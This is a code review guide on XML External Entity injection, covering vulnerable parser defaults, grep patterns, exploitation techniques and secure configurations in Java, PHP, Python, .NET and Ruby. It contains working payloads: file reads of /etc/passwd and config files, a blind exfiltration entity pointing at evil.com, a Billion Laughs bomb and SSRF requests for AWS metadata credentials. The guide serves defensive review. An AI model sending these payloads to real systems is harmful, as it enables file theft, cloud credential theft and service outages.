XML External Entities (XXE) Code Review Guide
Introduction
XML External Entity (XXE) injection is a vulnerability that targets applications parsing XML input. When XML parsers are configured to process external entity references, attackers can read local files, perform server-side request forgery (SSRF), or cause denial of service.
XXE was ranked #4 in the OWASP Top 10 2017 (A4:2017) before being merged into the broader "Security Misconfiguration" category in the 2021 edition. Although safer defaults in modern parsers have reduced its prevalence, XXE remains a serious risk in enterprise applications, document processing systems, and APIs accepting XML input.
Where XXE Still Lurks
XXE commonly appears in SOAP web services, SAML authentication, Office document processing (DOCX and XLSX files are ZIP archives of XML parts), SVG image handling, RSS/Atom feed parsing, and any legacy system accepting XML. Many developers assume JSON-only APIs are safe, but an XML parser may still be reachable, for example when a framework selects the parser based on the request's Content-Type header.
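Because Office documents are ZIP archives, a reviewer can list the XML parts that a document-processing path would hand to a parser. The following is a minimal sketch using Python's standard zipfile module. The helper name xml_parts_with_doctype and the in-memory sample archive are illustrative assumptions, and the byte search is a heuristic (it would miss UTF-16 encoded parts, for instance).

```python
import io
import zipfile


def xml_parts_with_doctype(archive_bytes: bytes) -> list:
    """Return names of XML parts inside a ZIP archive that declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            # A DOCTYPE must precede the root element, so only the head is checked.
            head = archive.read(name)[:4096]
            if b"<!DOCTYPE" in head:
                flagged.append(name)
    return flagged


# Hypothetical stand-in for a DOCX: one clean part and one part carrying a DTD.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as sample:
    sample.writestr("word/document.xml", "<document/>")
    sample.writestr(
        "docProps/core.xml",
        '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>',
    )

print(xml_parts_with_doctype(buffer.getvalue()))  # ['docProps/core.xml']
```

Legitimate Office parts do not normally need a DOCTYPE, so a hit like this is worth a closer look during review.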
Understanding XML Entities
XML entities are placeholders that get replaced with their defined values during parsing. They come in several types, and understanding them is essential for identifying XXE vulnerabilities.
XML Entity Types
<!-- INTERNAL ENTITY: Defined and used within the document -->
<!DOCTYPE doc [
  <!ENTITY company "Acme Corporation">
]>
<doc>Welcome to &company;</doc>
<!-- Result: Welcome to Acme Corporation -->

<!-- EXTERNAL ENTITY: References external resource (XXE vector!) -->
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<doc>&xxe;</doc>
<!-- Result: Contents of /etc/passwd! -->

<!-- PARAMETER ENTITY: Used within DTD definitions (%) -->
<!DOCTYPE doc [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://evil.com/?data=%file;'>">
  %eval;
]>
<!-- Used in blind XXE attacks -->
<!-- Note: conforming parsers reject a parameter-entity reference inside a declaration -->
<!-- in the internal subset, so real payloads usually host the eval definition in an external DTD -->

<!-- PREDEFINED ENTITIES: Built-in, safe -->
&lt;   <!-- < -->
&gt;   <!-- > -->
&amp;  <!-- & -->
&quot; <!-- " -->
&apos; <!-- ' -->
DTD (Document Type Definition) Basics
<!-- DTD can be internal (inline) or external -->

<!-- Internal DTD -->
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ELEMENT root (child)>
  <!ELEMENT child (#PCDATA)>
  <!ENTITY name "value">
]>
<root><child>&name;</child></root>

<!-- External DTD (referenced by URL) -->
<?xml version="1.0"?>
<!DOCTYPE root SYSTEM "http://example.com/schema.dtd">
<root>...</root>

<!-- External DTD (PUBLIC identifier) -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!-- The SYSTEM keyword fetches from URL or file path -->
<!-- This is what makes XXE possible! -->
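Entity substitution is easy to observe from code. The sketch below uses Python's standard xml.etree.ElementTree to parse the internal and external entity examples from this section. It assumes CPython's Expat-backed parser, which expands internal entities but does not fetch external ones. The variable names are illustrative.

```python
import xml.etree.ElementTree as ET

INTERNAL = """<!DOCTYPE doc [
  <!ENTITY company "Acme Corporation">
]>
<doc>Welcome to &company;</doc>"""

EXTERNAL = """<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<doc>&xxe;</doc>"""

# The internal entity is replaced with its declared value during parsing.
root = ET.fromstring(INTERNAL)
print(root.text)  # Welcome to Acme Corporation

# The external entity is not fetched; ElementTree reports a parse error instead.
try:
    leaked = ET.fromstring(EXTERNAL).text
except ET.ParseError as error:
    leaked = None
    print("external entity not resolved:", error)
```

A parser that does resolve external entities would return the file contents in place of the reference, which is the behavior the rest of this guide is about.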
XXE Attack Types
XXE can be exploited in several ways depending on how the application handles XML and returns responses. Understanding each attack type helps assess vulnerability impact.
XXE Attack Types
File disclosure: Read local files such as /etc/passwd, configuration files, and source code using the file:// protocol.
SSRF: Make server-side requests to internal services using the http:// protocol.
Blind (out-of-band) XXE: Exfiltrate data via DNS or HTTP when no direct response is visible.
Denial of service: Exponential entity expansion exhausts memory and takes the service down.
Classic XXE - File Disclosure
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <username>&xxe;</username>
</userInfo>

<!-- Server response might include: -->
<response>
  <message>Welcome, root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...</message>
</response>

<!-- Common file targets: -->
<!-- Linux: /etc/passwd, /etc/shadow, ~/.ssh/id_rsa, /proc/self/environ -->
<!-- Windows: C:\Windows\win.ini, C:\Windows\System32\drivers\etc\hosts -->
<!-- App: ../../../config.php, /var/www/html/.env, WEB-INF/web.xml -->
Billion Laughs Attack (DoS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

<!-- Each of the eight levels (lol2 through lol9) multiplies by 10: 10^8 = 100 million "lol"s -->
<!-- This small XML expands to roughly 300 MB of "lol" strings -->
<!-- The classic payload adds one more level: 10^9 = 1 billion "lol"s, about 3 GB -->
<!-- Causes memory exhaustion and denial of service -->

<!-- Also called "XML Bomb" or "Exponential Entity Expansion" -->
XXE Attack Flow
1. The attacker submits XML that contains an external entity definition pointing to a sensitive file.
2. The parser resolves the external entity and fetches the file content.
3. The reference is substituted: &xxe; → contents of /etc/passwd.
4. The response contains the file contents, or an error message reveals the data.
Impact: XXE can read local files, perform SSRF to internal systems, cause denial of service, and in some cases achieve remote code execution.
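The size of a Billion Laughs expansion can be computed without expanding anything, by summing entity lengths recursively. The following is a minimal sketch in Python. The function name expanded_length and the reference-matching regular expression are illustrative assumptions. It rebuilds the entity table of the payload shown earlier, where lol is the base string and lol2 through lol9 each repeat the previous entity ten times.

```python
import re
from functools import lru_cache

ENTITY_REF = re.compile(r"&([A-Za-z_][\w.-]*);")


def expanded_length(entities: dict, name: str) -> int:
    """Length of an entity after full expansion, computed without expanding it."""

    @lru_cache(maxsize=None)
    def length(entity: str) -> int:
        value = entities[entity]
        total = 0
        position = 0
        for match in ENTITY_REF.finditer(value):
            total += match.start() - position   # literal text before the reference
            total += length(match.group(1))     # expanded size of the referenced entity
            position = match.end()
        return total + len(value) - position    # trailing literal text

    return length(name)


# Entity table equivalent to the payload: lol, then lol2 .. lol9.
entities = {"lol": "lol"}
for level in range(2, 10):
    previous = "lol" if level == 2 else f"lol{level - 1}"
    entities[f"lol{level}"] = f"&{previous};" * 10

size = expanded_length(entities, "lol9")
print(size)  # 300000000
```

Eight tenfold levels over a 3-byte string give 3 × 10^8 bytes. The widely cited variant with nine levels reaches 3 × 10^9, which is where the "billion" in the name comes from.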
Finding Vulnerable Parsers
Different XML parsing libraries have different default configurations. Some are safe by default, while others enable dangerous features. During code review, identify which parser is used and verify its configuration.
XML Parser Default Security
| Language | Parser | Default DTD | Default External Entities |
|---|---|---|---|
| Java | DocumentBuilderFactory | Enabled ⚠️ | Enabled ⚠️ |
| Java | SAXParserFactory | Enabled ⚠️ | Enabled ⚠️ |
| Java | XMLInputFactory (StAX) | Enabled ⚠️ | Enabled ⚠️ |
| Python | xml.etree.ElementTree | Internal subset processed ⚠️ | Disabled ✓ (references raise ParseError) |
| Python | lxml | Enabled ⚠️ | Enabled before lxml 5.0 ⚠️ (network access off); internal only in 5.0+ ✓ |
| Python | xml.sax | Enabled ⚠️ | Disabled ✓ since Python 3.7.1; enabled earlier ⚠️ |
| PHP | simplexml_load_string | Enabled ⚠️ | Disabled ✓ with libxml2 2.9.0+ unless LIBXML_NOENT is passed ⚠️ |
| PHP | DOMDocument | Enabled ⚠️ | Disabled ✓ with libxml2 2.9.0+ unless LIBXML_NOENT is passed ⚠️ |
| .NET | XmlDocument | Varies by version | Disabled ✓ in .NET Framework 4.5.2+; enabled earlier ⚠️ |
| .NET | XmlReader | Disabled ✓ (.NET 4.5.2+) | Disabled ✓ |
| Node.js | libxmljs | Disabled ✓ | Disabled ✓ |
| Ruby | Nokogiri | Disabled ✓ | Disabled ✓ |
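Because defaults shift between runtime versions, it can help to query the parser rather than trust a table. The sketch below does this for Python's standard xml.sax parser and then sets the relevant features explicitly. It assumes the default Expat-based reader returned by make_parser().

```python
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes

parser = xml.sax.make_parser()

# Report what this runtime does by default for external general entities.
print("external general entities:", bool(parser.getFeature(feature_external_ges)))

# Set the features explicitly so the code does not depend on version defaults.
parser.setFeature(feature_external_ges, False)
parser.setFeature(feature_external_pes, False)
```

The same idea applies in other languages: configure the parser explicitly and treat the default as unknown.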
Vulnerable Parser Patterns
// VULNERABLE: Java DocumentBuilderFactory (default settings)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(xmlInput); // XXE possible!

// VULNERABLE: Java SAXParser (default settings)
SAXParserFactory spf = SAXParserFactory.newInstance();
SAXParser parser = spf.newSAXParser();
parser.parse(xmlInput, handler); // XXE possible!

// VULNERABLE: Java XMLInputFactory (StAX)
XMLInputFactory xif = XMLInputFactory.newInstance();
XMLStreamReader reader = xif.createXMLStreamReader(input); // XXE possible!

// VULNERABLE: Java Unmarshaller (JAXB)
JAXBContext context = JAXBContext.newInstance(MyClass.class);
Unmarshaller unmarshaller = context.createUnmarshaller();
MyClass obj = (MyClass) unmarshaller.unmarshal(xmlSource); // XXE possible!
More Vulnerable Patterns
# VULNERABLE: PHP (libxml2 before 2.9.0, or any version when LIBXML_NOENT is passed)
$doc = simplexml_load_string($xml); // XXE on older libxml2
$dom = new DOMDocument();
$dom->loadXML($xml); // XXE on older libxml2

# VULNERABLE: Python xml.sax (before Python 3.7.1)
parser = xml.sax.make_parser()
parser.parse(xml_input) # External general entities were enabled by default

# VULNERABLE: .NET (older versions)
XmlDocument doc = new XmlDocument();
doc.LoadXml(xmlString); // XXE in .NET Framework < 4.5.2

# VULNERABLE: Ruby REXML (older versions)
doc = REXML::Document.new(xml_string) # Check version!

# Code review grep patterns:
grep -rn "DocumentBuilderFactory" --include="*.java"
grep -rn "SAXParserFactory" --include="*.java"
grep -rn "XMLInputFactory" --include="*.java"
grep -rn "simplexml_load" --include="*.php"
grep -rn "DOMDocument" --include="*.php"
grep -rn "xml\.sax" --include="*.py"
grep -rn "XmlDocument" --include="*.cs"
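The grep patterns above can also be applied from a script, for instance inside a review tool that already has file contents in memory. The following is a minimal sketch. The names RISKY_PATTERNS and find_parser_usage and the language keys are illustrative assumptions, and the pattern set only covers the parser names listed in this section.

```python
import re

# Parser entry points taken from the grep patterns in this section.
RISKY_PATTERNS = {
    "java": re.compile(r"\b(?:DocumentBuilderFactory|SAXParserFactory|XMLInputFactory)\b"),
    "php": re.compile(r"\b(?:simplexml_load_\w+|DOMDocument)\b"),
    "python": re.compile(r"\bxml\.sax\b"),
    "csharp": re.compile(r"\bXmlDocument\b"),
}


def find_parser_usage(source: str, language: str) -> list:
    """Return (line_number, matched_name) pairs for parser entry points in source."""
    pattern = RISKY_PATTERNS[language]
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        for match in pattern.finditer(line):
            hits.append((number, match.group(0)))
    return hits


sample = """DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
"""
print(find_parser_usage(sample, "java"))
# [(1, 'DocumentBuilderFactory'), (1, 'DocumentBuilderFactory')]
```

A hit only marks a place to look. Whether the code is vulnerable depends on how the factory is configured before it is used.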
Exploitation Techniques
XXE exploitation varies based on what protocols the parser supports and whether the application returns XML content in responses. Here are common exploitation techniques.
Basic File Read
<!-- Reading /etc/passwd on Linux -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

<!-- Reading files on Windows -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<data>&xxe;</data>

<!-- Reading application config -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
]>
<data>&xxe;</data>

<!-- PHP source may break XML due to < > characters -->
<!-- Use PHP wrapper to base64 encode: -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
Handling Special Characters
<!-- Problem: Files with < > & break XML parsing -->
<!-- Solution 1 (often cited, but ineffective): CDATA wrapper around the reference -->
<!-- Entity references inside a CDATA section are literal text and are not expanded -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data><![CDATA[&xxe;]]></data>

<!-- Solution 2: PHP base64 filter -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<data>&xxe;</data>
<!-- Returns (base64 of the first line shown): cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo= -->

<!-- Solution 3: Parameter entities with CDATA -->
<!-- These declarations normally have to live in an attacker-hosted external DTD, because -->
<!-- parameter-entity references inside a declaration are not allowed in the internal subset -->
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % end "]]>">
  <!ENTITY % wrapper "<!ENTITY xxe '%start;%file;%end;'>">
  %wrapper;
]>
<data>&xxe;</data>
Directory Listing
<!-- Some parsers support directory listing with file:// -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///var/www/">
]>
<data>&xxe;</data>

<!-- Java file protocol often supports directory listing -->
<!-- Returns list of files in directory -->

<!-- Alternative: Use the jar: protocol in Java to read a file inside an archive -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "jar:file:///var/www/app.war!/WEB-INF/web.xml">
]>
<data>&xxe;</data>
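When a file is retrieved through the PHP base64 filter shown under Handling Special Characters, the response carries an encoded string that has to be decoded on the reviewer's side. A short Python sketch, using the sample value from that listing:

```python
import base64

# Sample value from the base64 filter example in this section.
encoded = "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo="

decoded = base64.b64decode(encoded).decode("utf-8")
print(decoded, end="")  # root:x:0:0:root:/root:/bin/bash
```

Base64 output contains only letters, digits, +, / and =, which is why it survives being embedded in an XML response where raw PHP source would not.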
SSRF via XXE
XXE can be used to perform Server-Side Request Forgery (SSRF) by making the server fetch content from internal or external URLs. This can probe internal services, access cloud metadata, or exploit internal APIs.
SSRF via XXE Payloads
<!-- Probe internal network -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.1/">
]>
<data>&xxe;</data>

<!-- Access cloud metadata (AWS) -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

<!-- Internal service scanning -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<data>&xxe;</data>

<!-- Port scanning via error messages -->
<!-- Open port: Returns content or empty response -->
<!-- Closed port: Connection refused error -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server:22/">
]>
Protocol Handlers
# Different parsers support different protocols:

file://    - Local file access (most parsers)
http://    - HTTP requests (most parsers)
https://   - HTTPS requests (most parsers)
ftp://     - FTP requests (some parsers)
jar:       - Java archive access (Java parsers)
netdoc://  - Java network document (older Java)
gopher://  - Gopher protocol (some parsers, powerful SSRF)
dict://    - Dictionary protocol
php://     - PHP wrappers (PHP only)
data://    - Data URLs (some parsers)
expect://  - Command execution (PHP with expect, rare)

# Java-specific protocols:
jar:file:///path/to/file.jar!/internal/file.xml
netdoc:///etc/passwd (deprecated but may work)

# Useful for SSRF:
http://169.254.169.254/ - Cloud metadata
http://localhost:port/ - Local services
http://internal-host/ - Internal network
XXE to Full Cloud Compromise
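On cloud platforms (AWS, GCP, Azure), XXE-based SSRF to the instance metadata endpoint (169.254.169.254) can retrieve temporary IAM credentials, which may lead to compromise of the cloud account as far as the attached role's permissions allow. The exposure is greatest on AWS instances that still allow IMDSv1, which answers plain GET requests. IMDSv2 requires a session token obtained with a PUT request, and the GCP and Azure metadata services require a custom request header (Metadata-Flavor: Google and Metadata: true, respectively), which an entity fetch generally cannot supply. This is one of the most severe XXE exploitation paths.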
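When triaging payloads found in logs or test cases, it can be useful to classify where an entity's SYSTEM identifier points. The sketch below is a rough illustration using Python's standard ipaddress and urllib.parse modules. The function name classify_system_identifier and the category labels are assumptions made for this example, and hostnames are not resolved.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_system_identifier(uri: str) -> str:
    """Roughly classify the target of an entity's SYSTEM identifier."""
    parts = urlsplit(uri)
    if parts.scheme not in ("http", "https"):
        return f"non-http scheme: {parts.scheme or 'none'}"
    host = parts.hostname or ""
    if host == "localhost":
        return "loopback"
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return "hostname (needs DNS resolution to judge)"
    # Link-local is checked first: 169.254.0.0/16 is also reported as private.
    if address.is_link_local:
        return "link-local (cloud metadata range)"
    if address.is_loopback:
        return "loopback"
    if address.is_private:
        return "private network"
    return "public address"


for target in (
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://192.168.1.1/",
    "http://localhost:8080/admin",
    "file:///etc/passwd",
):
    print(target, "->", classify_system_identifier(target))
```

This kind of check is an aid for analysis, not a defense. Filtering URLs is easy to bypass, and the reliable fix remains parser configuration.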
Prevention Techniques
The most effective XXE prevention is to disable DTD processing and external entities in the XML parser. Each language and parser has specific configuration options.
Secure Configuration - Java
// SECURE: DocumentBuilderFactory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

// Disable DTDs entirely
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

// Or disable external entities specifically
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(xmlInput); // Now safe!

// SECURE: SAXParserFactory
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

// SECURE: XMLInputFactory (StAX)
XMLInputFactory xif = XMLInputFactory.newInstance();
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
Secure Configuration - Other Languages
# SECURE: PHP
// PHP < 8.0: disable the external entity loader before loading
// (deprecated in PHP 8.0, where libxml2 2.9.0+ already disables it by default)
libxml_disable_entity_loader(true);
// Do NOT pass LIBXML_NOENT or LIBXML_DTDLOAD: they turn on entity substitution
// and external DTD loading, which is exactly what XXE needs
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);

// LIBXML_NONET additionally prevents network access
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);

# SECURE: Python
# xml.etree.ElementTree does not resolve external entities,
# but it still expands internal ones (Billion Laughs risk on older Expat builds)
import xml.etree.ElementTree as ET
tree = ET.parse(xml_file) # No external entity resolution

# defusedxml library for maximum safety
import defusedxml.ElementTree as ET
tree = ET.parse(xml_file) # Explicitly safe

# SECURE: .NET (C#)
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit; // Safest
settings.XmlResolver = null; // Disable external resolution

using (XmlReader reader = XmlReader.Create(stream, settings))
{
    // Safe parsing
}

# SECURE: Ruby Nokogiri
doc = Nokogiri::XML(xml_string) do |config|
  config.strict.nonet # Disable network access
end
XXE Prevention Checklist
| Control | Implementation | Priority |
|---|---|---|
| Disable DTDs | disallow-doctype-decl = true | Critical |
| Disable external entities | external-general-entities = false | Critical |
| Disable parameter entities | external-parameter-entities = false | Critical |
| Disable external DTD loading | load-external-dtd = false | High |
| Disable XInclude | setXIncludeAware(false) | High |
| Use safe libraries | defusedxml (Python), Nokogiri (Ruby) | High |
| Input validation | Reject XML with DOCTYPE | Medium |
| WAF rules | Block DOCTYPE in XML requests | Medium |
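The "Reject XML with DOCTYPE" control can be enforced in the parsing path itself rather than in a filter in front of it. The following is a minimal standard-library Python sketch of that idea. The names DoctypeForbidden and parse_without_dtd are hypothetical, and the two-pass design is an assumption chosen for clarity, not the only way to do it. Libraries such as defusedxml offer the same protection ready-made.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when the input declares a DOCTYPE."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by Expat as soon as a DOCTYPE declaration starts.
    raise DoctypeForbidden(f"DOCTYPE declarations are not allowed: {name!r}")


def parse_without_dtd(xml_text: str) -> ET.Element:
    """Parse XML, refusing any document that carries a DOCTYPE."""
    # First pass: a bare Expat parser whose only job is to reject DOCTYPEs.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)
    # Second pass: ordinary parse of input now known to contain no DTD.
    return ET.fromstring(xml_text)


print(parse_without_dtd("<order><item>book</item></order>").find("item").text)  # book

try:
    parse_without_dtd('<!DOCTYPE foo [<!ENTITY x "y">]><foo>&x;</foo>')
except DoctypeForbidden as error:
    print("rejected:", error)
```

Rejecting the DOCTYPE outright covers external entities, parameter entities, and entity expansion attacks at once, at the cost of refusing documents that legitimately need a DTD.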